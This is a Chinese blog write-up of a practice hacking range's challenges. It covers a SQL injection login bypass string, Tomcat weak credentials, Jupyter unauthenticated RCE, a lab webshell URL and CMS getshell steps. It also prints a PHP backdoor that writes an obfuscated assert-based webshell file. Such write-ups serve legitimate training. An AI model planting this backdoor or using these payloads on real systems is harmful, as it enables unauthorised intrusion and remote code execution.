3G0众测靶场-0407 WriteUp

于 2020-05-04 03:04:47 发布
阅读量1.8k 收藏 8
点赞数 2
文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/105912156
版权

0x01 前言

昨天参加了3G0众测的题目,一直没来得及更新题目,今天的话看JC师傅整理了一下,我这边也来凑下热闹。内容挺基础,但是对一些CMS类型和框架不熟悉的话,就很容易走偏路,经常看响应包,还有就是判断CMS类型,是一个非常重要的事情,博主也是一个比较实在的人,有一说一,所以大家也不要见怪。补充一句,博主也有没做出来的,比如逆向这种题目,我直接略过了,然后大家还是做的时候细心一些,很容易就会通过。

0x02 题目内容

1.逻辑漏洞(考点任意密码重置)

2.流量包溯源(找第一个POST包,可以看到是一个图片马)

3.还是溯源(查看爆破成功的账号,这里因为对wireshark不太熟练,摸了半天,发现爆破的是OA系统,爆破会发起一个请求包,爆破成功会从服务器返回一个与众不同的响应包,指定服务器的IP地址作为过滤)

找黑客留的后门(比较简单,用菜刀连一下就得到key)

http://116.63.149.36:52306/www/hack/bin.php?e=YXNzZXJ0 密码POST

5.万能密码

进来是一个后台界面随手试

Admin’ or 1=1#

1111

进来了

6.Jupyter未授权访问

这个是一个在线编辑器,直接就RCE了

7.tomcat弱口令+任意文件上传

弱口令admin:123456

然后上传一个war包

Getshell

8.代码审计

大致意思是这样的

<?php

if(!empty($_GET[1]) && $_GET[1]==’GET.fPZ87′){$_=@fopen(‘t.php’, ‘a’);

@fwrite($_,”<?php \$_=str_replace(‘ilo’,’ass’,str_replace(‘vey’,’ert’,\$_GET[2]));@\$_(\$_POST[1]);?>”);

@fclose($_);}

?>

判断传入的参数1==GET.fPZ87,如果存在就生成t.php

然后连接t.php

9.凡诺cms的两个洞

一个是前台登陆绕过,然后后台文件包含getshell

这边采用的是include爆破phpinfo, 利用条件竞争 来进行拿flag,这里参考一篇文章:

https://www.anquanke.com/post/id/201136

10.同时接触一个Drupal的漏洞,直接EXP去打

0x03 补充上一些网上公众号以及大佬的总结

https://mp.weixin.qq.com/s?__biz=MzI2MTI1MDQ5Mw==&mid=2247483766&idx=1&sn=6fbf2fc0c450de43d72ffe23869d353d&chksm=ea5c0da4dd2b84b23f862282c21a08b5b64158933889144dd09d501d972c3c3a42c660ab2a7c&mpshare=1&scene=23&srcid=0407pdVD0laU0WV7YZu2EELo&sharer_sharetime=1586234567548&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

https://mp.weixin.qq.com/s?__biz=MzI2MTI1MDQ5Mw==&mid=2247483766&idx=1&sn=6fbf2fc0c450de43d72ffe23869d353d&chksm=ea5c0da4dd2b84b23f862282c21a08b5b64158933889144dd09d501d972c3c3a42c660ab2a7c&mpshare=1&scene=23&srcid=0407pdVD0laU0WV7YZu2EELo&sharer_sharetime=1586234567548&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

https://mp.weixin.qq.com/s?__biz=Mzg5NTIxNDE3NQ==&mid=2247484111&idx=1&sn=36f01bf4accab1ce0159d160f04b3555&chksm=c012f5fff7657ce9898b134b88e403534fae671795d393565c3fad90f1f3c138ea0add13b1b8&mpshare=1&scene=23&srcid=&sharer_sharetime=1586234224938&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247484561&idx=1&sn=b2f89b477e4f7f8f20000063a86b4fc5&chksm=90392261a74eab77b95ae286328e1ba6bd076ff939aa19cee46314ea92c9e5b6521c8240050d&mpshare=1&scene=23&srcid=&sharer_sharetime=1586234188851&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247484568&idx=1&sn=88e55ad47894114afd8ac90280c69c8c&chksm=90392268a74eab7e8837ac6d38bb94a834e95d9bb34635f974fd5eda5f720241772264fce58a&mpshare=1&scene=23&srcid=&sharer_sharetime=1586234175269&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247484568&idx=1&sn=88e55ad47894114afd8ac90280c69c8c&chksm=90392268a74eab7e8837ac6d38bb94a834e95d9bb34635f974fd5eda5f720241772264fce58a&mpshare=1&scene=23&srcid=&sharer_sharetime=1586234175269&sharer_shareid=1a4a1d8d5a85d33bd0507493a4cb21c4#rd

转载请注明:Adminxe's Blog » 3G0众测靶场-0407 WriteUp

Adminxe
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
国内SRC漏洞挖掘技巧与经验分享
01-29
SRC经验文档
360众测仿真实战靶场考核技巧分享
siu~
09-23 1974
360众测仿真实战靶场考核技巧分享
记一次360众测仿真实战靶场考核WP
god_Zeo的安全博客
04-06 8421
0x00 考核主要分为两部分 第一部分为客观题:分为单选题,多选题,和判断题。 我记录了一道有趣的题,也是不清楚正确答案的群 第二部分为操作题: 0x01客观题 我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗 0x02:操作题 源码分析题,给你源码提及一个数据 PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻 网站被黑,可以下载整站,找后门 下载源码,找...
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
edusrc-web:edusrc用户主页数据分析与查询
03-15
edusrc网站 edusrc用户主页在线数据分析与查询
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
第86天:SRC挖掘-教育行业平台&规则&批量自动化1
08-03
SRC 挖掘-教育行业平台&规则&批量自动化参考:https://src.sjtu.edu.cn/introduction/1.法律法规:第八条 按照对信息系统
0RAYS-祥云杯writeup .pdf
09-05
0RAYS-祥云杯writeup 安全开发 业务安全 信息安全研究 安全运营 信息安全
ifa-ctf-writeup
03-17
ifa-ctf-writeup
PML-Prediction-Assignment-Writeup
05-31
我只是想谢谢你!!!!!
Systems-Administration-Writeup
04-02
系统管理-课程撰写 内容 ---- ---正则 -- - - ---- ---- -
动态污点分析浅述
leeeryan
03-22 8511
动态污点分析浅述原理<br />动态污点分析(Dynamic Taint Analysis)是近几年刚刚被提出的一种新的有效检测各种蠕虫攻击和自动提取特征码用于IDS和IPS的一系列解决方案。其原理主要分为两大部分:动态污点标记和非法操作检测、以及更精确的提取特征码的方法。动态污点标记和非法操作检测:<br />其 主要原理是将来自于网络等不被信任的渠道的数据都会被标记为“被污染”的,由此产生的一系列算术和逻辑操作新生成的数据也会继承源数据的“是否被 污染”的属性,这样,一旦检测到被污染的数据作为跳转
memory-surprisal-writeup
04-05
内存意外写入
morpheme-ordering-writeup
03-20
语素排序写作
Prediction-Assignment-Writeup
03-18
预测分配作业
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值